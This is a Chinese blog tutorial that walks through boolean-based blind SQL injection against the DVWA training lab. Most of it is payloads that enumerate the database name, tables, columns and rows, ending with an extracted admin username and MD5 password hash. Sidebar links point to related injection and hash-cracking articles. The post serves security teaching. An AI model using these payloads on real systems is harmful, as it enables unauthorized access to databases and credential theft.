SQL 布尔盲注

已于 2022-10-15 16:29:27 修改
阅读量1.3k 收藏 8
点赞数 1
文章标签: sql web安全
于 2022-10-11 20:46:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42378173/article/details/127268687
版权

1.找到注入点

 1' or 1=1 #--

2.爆出数据库名称长度

 xxx' or length(database())<100#-- 

这个数据库名称小于100,我们一直拆解下去就行了(dvwa)

小于5有显示 ,小于4且没有显示。说明小于5不大于4.于是推出数据库名字等于4 

 xxx' or length(database())<5#-- 
 xxx' or length(database())<4#--

3.爆出数据库名字

已知条件(数据库名字长度4)。求数据库名称

xxx' or substr(database(),1,1)='d'#-- 

substr(1,2,3,)

1参数 一串字符

2从第几个开始

3.一次取几个

如:substr(abcd,1,2)  abcd中从第一开始取两个,就是ab

xxx' or substr(database(),1,1)='d'#-- 

xxx' or substr(database(),1,2)='dv'#-- 

xxx' or substr(database(),1,3)='dvw'#-- 

xxx' or substr(database(),1,4)='dvwa'#-- 

 爆出数据库名字 dvwa

4.查看库中有几个表

a. 查看表: select table_name from information_schema.tables where table_schema='dvwa'

如果这样查询会显示dvwa下面的所有表。

我们先看看这个库中表的数量有多少

b. select count(table_name) from information_schema.tables where table_schema='dvwa'

把b的语句用括号括起来当做一个整体,如果我们猜测这个dvwa数据库有100个表那么就该表示为:

100>(select count(table_name) from information_schema.tables where table_schema='dvwa')

最总语句为:

xxx' or 100>(select count(table_name) from information_schema.tables where table_schema='dvwa')#-- 

有显示,说明dvwa中的表数量小于100

 xxx' or 2>(select count(table_name) from information_schema.tables where table_schema='dvwa')#--

2>表数量  无显示

3>表示量 有显示

说明小于3 不小于2,那就等于2

 

 查出dvwa数据库下面有两个表

5.查看数据库下面的表名长度

已知条件(数据库dvwa   有2个表) 求两个表的表名

 A. select table_name from information_schema.tables where table_schema='dvwa' #-- 

如果有两个表就会一起查询出来。我们现在只要知道第一个表的名称长度就行

limit函数

limit 0,1, 从表中的第0个数据开始,只读取一个

如果A语句查询出来aaa表和bbb表,那么用这个函数就只会显示第一个表也就是aaa表

B.select table_name from information_schema.tables where table_schema='dvwa' limit 0,1 #-- 

现在B语句最终显示的是aaa表,我们就用length()函数获取他的表长度.

C.   length( (B语句) )<10 #--    因为这里B是一个整体所以要用()括起来

最总语句:

xxx' or length((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1)) <10#--

 第一个表长度小于10

最后小于10有回显,小于9.没有回显。得出等于9  。

dvwa的第一个表名称等于9 。

要想判断第二个只需要修改 【limit 0 ,1】 改为 【limit 1,1】

 xxx' or length((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1)) =5#--

最后得出dvwa的两个表长度分别为 9 和 5

6.查看数据库下的表名名称

已知条件(数据库dvwa  、 两个表长度为9,5)

搜索表的方式:

(select table_name from information_schema.tables where table_schema='dvwa' limit 1,1)

这是第二个表因为参数(limit 1,1)     我们用 substr(表名,1,1)   来获取表名(5个字符)

xxx' or substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,1)='u'#-- 

由于时间问题,每次猜的字符我都是选择正确的来猜解

 有回显,证明第二个表是5个字符,并且第一个是u

xxx' or substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,2)='us'#--   (第二个)
xxx' or substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,3)='use'#--    (第三个)
xxx' or substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,4)='user'#--   (第四个)
xxx' or substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,5)='users'#--  (第五个)

最终得知:第一个表和第二个表的名称

 

7.获取users表下的字段数量

A. select count(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'

把A当作一个整体最后就是统计出 users下载的字段数量。

xxx' or 7=(select count(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users' ) #--

简单来看就是: xxx' or 7=(6)#--

由于7不等于6所以没有回显,当xxx' or 6=(6)#--  就有回显

得出users表下面有6个字段

8.获取每个字段的长度

猜第一个字段 得出长7

xxx' or length((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1))=7#-- 

猜第二个字段 得出长10

xxx' or length((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 1,1))=10#-- 

猜第三个字段 得出长9

xxx' or length((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 2,1))=9#-- 

猜第四个字段 得出长4

xxx' or length((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1))=4#-- 

猜第五个字段 得出长8

xxx' or length((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 4,1))=8#-- 

猜第六个字段 得出长6

xxx' or length((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 5,1))=6#-- 

9.获取users表里面6个字段的值

已知条件(库dvwa   表users  字段6个而且还知道多少字节)

 xxx' or substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,1)='u'#--

简化就是  xxx' or substr( (字段), 1,1)='u' #--

这里我们获取第4个字段的值,由于是0开始的所以【limit3,1】 就是user

users表下面的第3个字段的第一个字是 u

 xxx' or substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,1)='u'#--

users表下面的第3个字段的第二个字是 us

 xxx' or substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,2)='us'#--

users表下面的第3个字段的第三个字是 use

 xxx' or substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,3)='use'#--

users表下面的第3个字段的第四个字是 user

 xxx' or substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 3,1),1,4)='user'#--

然后猜其它的字段名............

10.获取字段里面的数据

获取users表里面user字段和password字段的值

猜解user有多少条数据

xxx' or 5=(select count(user) from dvwa.users)#--

通过这条语句得出user下面有5条数据

猜解user的值长度

xxx' or length((select user from dvwa.users limit 0,1 ))=5#--   (第一条数据长度为5)

xxx' or length((select user from dvwa.users limit 1,1 ))=7#--   (第二条数据长度为7)

xxx' or length((select user from dvwa.users limit 2,1 ))=4#--   (第三条数据长度为4)

xxx' or length((select user from dvwa.users limit 3,1 ))=5#--   (第四条数据长度为5)

xxx' or length((select user from dvwa.users limit 4,1 ))=6#--   (第五条数据长度为6)

猜解user第一条数据的值

xxx' or substr((select user from dvwa.users limit 0,1),1,1)='a'#--

xxx' or substr((select user from dvwa.users limit 0,1),1,2)='ad'#--

xxx' or substr((select user from dvwa.users limit 0,1),1,3)='adm'#--

xxx' or substr((select user from dvwa.users limit 0,1),1,4)='admi'#--

xxx' or substr((select user from dvwa.users limit 0,1),1,5)='admin'#--

最后得出数据:dvwa库----users表-----user字段数据---admin

获取password字段数据

获取password数据有多少条

xxx' or 5=(select count(password) from dvwa.users)#-- 

猜解password的值长度

xxx' or length((select password from dvwa.users limit 0,1 ))=32#--  

(这里密码有32位,有理由怀疑是MD5加密)

猜解password第一条数据的值

xxx' or substr((select password from dvwa.users limit 0,1),1,1)='5'#--

xxx' or substr((select password from dvwa.users limit 0,1),1,2)='5f'#--

xxx' or substr((select password from dvwa.users limit 0,1),1,3)='5f4'#--

。。。。。一直到32

xxx' or substr((select password from dvwa.users limit 0,1),1,32)='5f4dcc3b5aa765d61d8327deb882cf99'#--

最后获取到账号密码

admin  ||  5f4dcc3b5aa765d61d8327deb882cf99

温馨提示:小心二刺螈
关注
Python使用彩虹表来尝试对MD5哈希进行破解
小hui的博客
06-30 238
请注意,如果使用的彩虹表中没有预先计算好的哈希值与目标MD5哈希匹配,破解将失败。此外,彩虹表的大小和效率取决于哈希算法的强度和输入范围的大小。因此,对于较强的哈希函数和较长的输入,彩虹表可能不够高效。然而,可以使用预先计算好的MD5哈希值的彩虹表(Rainbow Table)来尝试对MD5进行破解。MD5是一种散列算法,它是不可逆的,无法直接解密。它的主要作用是将输入数据进行散列,生成一个固定长度的唯一哈希值。的MD5哈希值,并且这个条目存在于你提供的彩虹表中。
SQL盲注篇之布尔盲注
weixin_47785246的博客
07-11 3033
简单介绍SQL注入中的盲注,通过靶场的练习,演示SQL盲注的一些常用方法与思路。
SQL布尔盲注
最新发布
2301_78549931的博客
08-05 943
布尔盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面,如果正确执行了构造的SQL语句,则返回一种页面,如果错误,则执行另一种页面。基于两种页面,来判断SQL语句正确与否,达到获取数据的目的。
SQL盲注布尔盲注
Dug123456_的博客
04-07 1378
flag有固定的格式,以右花括号结束,假设flag有小写英文字母、下划线、花括号构成,由于不知道flag长度,要一个无限循环,定义计数符j,内嵌循环i遍历小写、下划线和花括号,匹配到字符后j++,出循环的条件是当前i是右花括号,即flag结束。再大循环i次(遍历所有表),内嵌循环j次(表名的所有字符),i是表下标-1,j是字符下标,再内嵌循环k从a到z(假设表名全是小写英文字符)尝试获取每个表的表名。1 and length(database())=4 //判断数据库名字的长度是否为4。
SQL注入-布尔盲注
weixin_45095113的博客
03-12 777
布尔盲注
使用python进行sql布尔盲注exp的编写
CC210231的博客
04-04 2548
前言: 前面学习并实现了简单的注入exp编写,那是根据注入的payload 匹配 网页内容得到注入数据,像这种exp只能应用于简单的注入,盲注入就要复杂一些,但是原理也是差不多。 exp原理: 我们知道,对于sql布尔盲注,也就是页面只会返回两种状态,一种是注入语句正确执行返回正常页面,一种就是注入语句执行错误返回不正常页面,我们就可以通过返回页面的状态判断我们注入语句是否正确执行,在sql布尔盲注中,我们常通过逐个判断字符来得到最终的信息,源于此,我们就有如下思路了: 返回的页面不同,也就是返回.
SQL注入之基于布尔盲注详解
09-10
在基于布尔盲注中,攻击者通常会尝试构造一系列的SQL查询,这些查询会在满足特定条件时改变原本的查询结果,从而导致网页返回不同的状态。例如,通过在URL中添加`id=2' and length(database())>1 %23`这样的参数,...
布尔盲注.py_sql盲注python_
10-03
布尔盲注(Boolean-Based Blind Injection)是SQL注入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,...
ctfhub-sql布尔盲注
god_001的博客
06-01 683
打开网址,先输入: 得到:输入: 得到:看出可以布尔盲注查看当前表名: 于是先得到当前数据库种包含的表名: 得到: 再查看表格flag包含的字段: 得到: 于是最后一步读取flag表种flag字段的内容: 得到:
《网络安全自学教程》- SQL注入之布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 3520
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
SQL注入——布尔盲注
TGFXK的博客
03-21 300
原理:前面几关都有数据回显,而在有的界面不会回显数据,只会显示对错,此时查库名等就比较难查,只能根据猜对错来判断。
SQL注入-布尔盲注
acepanhuan的博客
02-10 1724
学习SQL注入方法之盲注
sql注入--布尔盲注
pakho_C的博客
01-02 1321
sql注入–布尔盲注 靶场:sqli-labs-master 下载链接:靶场下载链接 第8关 盲注 php源码 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id'])) { $id=$_GET['id']; //logging the conn
sql注入—布尔盲注
qq_45927819的博客
06-25 1458
文章目录布尔盲注原理sqli-labs-less8burpsuite爆破数据库名(一)burpsuite爆破数据库名(二) 盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。 布尔盲注 原理 注入的时候只会返回True和False,所以布尔盲注就是根据页面显示的是True还是False进行猜测数据库中的信息。 布尔盲注需要几个函数的辅助,就先来了解一下这几个函数 length()函数可返回字符串的长度 substring()函数可以截取字符串,可指定开始的位置和
墨者 - SQL注入漏洞测试(布尔盲注)
吃肉唐僧的博客
07-01 5183
手工注入 根据浮动的通告进度条,找到sql注入点 输入/new_list.php?id=1' and 1=1,内容空白 输入/new_list.php?id=1 and 1=1,内容显示,判断这个id的值类型是数字类型 然后开始判断数据库名字的长度,/new_list.php?id=1 and length(database())=1,内容空白。一直试,试到长度为10 ...
布尔类型的SQL盲注注入
m0_64368365的博客
02-20 1818
布尔盲注适用于无回显的情况,只有通过true或false及页面是否正常来判断所输入内容是否正确。
墨者靶场sql布尔盲注
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值